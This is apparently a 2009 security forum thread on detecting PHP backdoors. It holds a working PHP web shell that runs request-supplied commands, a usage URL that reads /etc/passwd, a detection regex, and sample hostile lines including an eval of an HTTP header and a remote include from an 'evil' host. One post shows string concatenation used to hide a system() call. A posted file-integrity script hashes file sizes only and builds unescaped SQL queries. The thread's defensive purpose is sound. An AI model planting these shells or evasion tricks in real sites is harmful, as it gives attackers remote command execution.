Hey, guys!

I want to create a project to detect the php backdoor, and I found a very easy example of php backdoor is(by http://michaeldaw.org):
<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>

Usage: hxxp://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

So we should write a python/perl script to scan every file in the directory and find if there is a "system" in it?

Besides "system", I think there should be some more command we should concentrate on, for example "exec".

However, I don't have a full list of the dangerous command, waiting for your advice:p



Edited 1 time(s). Last edit at 09/08/2009 04:51AM by hookits.

/exec|system|eval|`|dl|passthru|{\s*\$\s*{.*}\s*}|include|require/i

is what I would start off with.
But you may want to omit include/require.

examples:
eval($_SERVER['HTTP_EVIL']);
`cat /etc/passwd`;
$a='php'.'info';$z="{${$a()}}";
include 'http://evil/...';

Code obfuscation is the very next thing they'll do if they know this is how they're being detected. But it'll probably work well for a while.

- RSnake
Gotta love it. http://ha.ckers.org

chroot jail + php safe_mode on older versions of PHP. But php safe_mode can be bypassed in some situations, don't rely on it ALONE. Further, disable PHP modules you never use, like fopen for example. Pretty much depends on what you allow or disallow.

To find it, just use your terminal find commands. Or try a program that shows the file diffs e.g. changes made to the file system after a certain point. (like aide IDS does).

Or try mine, maybe you can use it for some inspiration. It generates hashes from files and compares them run through a crontab. Pretty basic, but you get the idea.

<?php

/*

ZEROSUM - Automated File Integrity Bot.

Copyright (C) 2008 rvdh.ath.cx

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY;
without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/


TABLE STRUCTURE

CREATE TABLE `zerosum` (
	`id` int(11) NOT NULL auto_increment,
	`filename` varchar(255) NOT NULL default '',
	`permhash` varchar(40) NOT NULL default '',
	`filehash` varchar(40) NOT NULL default '',
	PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


CRONTAB


lynx -dump "http://www.example.com/zerosum.php" >/dev/null 2>&1

or

/usr/bin/php -q /home/public_html/zerosum.php


*/


# Store this below the /www/ folder!


$dbHost = "localhost";
$dbBase = "";
$dbUser = "";
$dbPass = "";


$dbLink = mysql_connect($dbHost, $dbUser, $dbPass) or die();
mysql_select_db($dbBase) or die();


function zerosum($dir){
    # Settings
    $update_files = false;

    # update files after check, program does this already.
    $index_files = false;

    # indexing files
    $mailbatch  = true;

    # send an alert mail
    $showbatch = false;

    # show batch onscreen
    $domain = 'example.com';

    $mailto  = 'YOU@example.com';

    $subject = 'Zerosums!';

    $hashses = array();

    $directory = dir($dir);

    while ($file = $directory->read()){
        if ($file != '.' && $file != '..') {
            $modified = date ("F d Y H:i:s", filemtime($dir.'/'.$file));
            $permission = substr(sprintf('%o', fileperms($dir.'/'.$file)), -4);
            $hashsum = filesize($dir.'/'.$file);
            array_push($hashses,htmlspecialchars($dir.'/'.$file,ENT_QUOTES,'UTF-8').'|'.$modified.'|'.$hashsum.'|'.$permission);
        }
    }
    $directory->
    close();
    if($showbatch) {
        echo '<p>Batchdate: '.date ("F d Y H:i:s").'</p>';
        $count = 0;
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("select * from zerosum where filename = '".$tmp[0]."'");
            if(mysql_num_rows($sql) >
            0) {
                while($row = mysql_fetch_array($sql)) {
                    if($row['filehash'] != sha1($tmp[2])) {
                        echo $row['filename'] . ' was altered on: ' . $tmp[1] . ' current permission: ' . $tmp[3] . ' size: ' . $hashsum . '<br>';
                        $count++;
                    }
                    if($row['permhash'] != sha1($tmp[3])) {
                        echo $row['filename'] . '\'s permission was altered to: ' . $tmp[3] . '<br>';
                        $count++;
                    }
                }
            }
            else {
                echo $tmp[0] . ' was deleted, or does not exist! <br>';
            }
            if($count >
            0) {
                # index all files again.
                $update_files = true;
            }
        }
    }
    if($mailbatch) {
        if($mailto) {
            $message1 = 'Batchdate: '.date ("F d Y H:i:s").', ';
            $count1 = 0;
            foreach($hashses as $hash) {
                $tmp1 = explode('|',$hash);
                $sql1 = mysql_query("select * from zerosum where filename = '".$tmp1[0]."'");
                if(mysql_num_rows($sql1) >
                0) {
                    while($row1 = mysql_fetch_array($sql1)) {
                        if($row1['filehash'] != sha1($tmp1[2])) {
                            $message1 .= $row1['filename'] . ' was altered on: ' . $tmp1[1] . ' current permission: ' . $tmp1[3] . ' size: ' . $hashsum . ', ';
                            $count1++;
                        }
                        if($row1['permhash'] != sha1($tmp1[3])) {
                            $message1 .= $row1['filename'] . '\'s permission was altered to: ' . $tmp1[3] . ', ';
                            $count1++;
                        }
                    }
                }
                else {
                    echo $tmp1[0] . ' was deleted, or does not exist! <br>';
                }
            }
            if($count1 >
            0) {
                # mail batch
                mail($mailto,$subject,$message1,"from:zerosum@".$domain);
                # index all files again.
                $update_files = true;
            }
        }
        else {
            echo 'Cannot email batch, e-mail is empty!';
            exit;
        }
    }
    if($update_files) {
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("update zerosum set filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."' where filename = '".$tmp[0]."'") or die();
        }
    }
    if($index_files) {
        # You must run this first, to Index all the files in the DIR!
        $empty = mysql_query("TRUNCATE TABLE `zerosum`") or die();
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("insert into zerosum set filename = '".$tmp[0]."', filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."'") or die();
        }
    }
    echo 'OK';
}


# Example call:

zerosum('tutorialstuff');


?>

Edited 1 time(s). Last edit at 09/12/2009 09:30AM by rvdh.

Or, if you want to scan the source, here is a symbol list I composed. Note, this took a very long time to gather. I currently use this in a FireFox extension to scan source code.

http://rvdh.ath.cx/projects/symbols.txt

Doesn't stop someone doing something like
<?php
$a ="sy";
$b = "ste";
$c = "m";

$func = $a.$b.$c;

$func("ls");

?>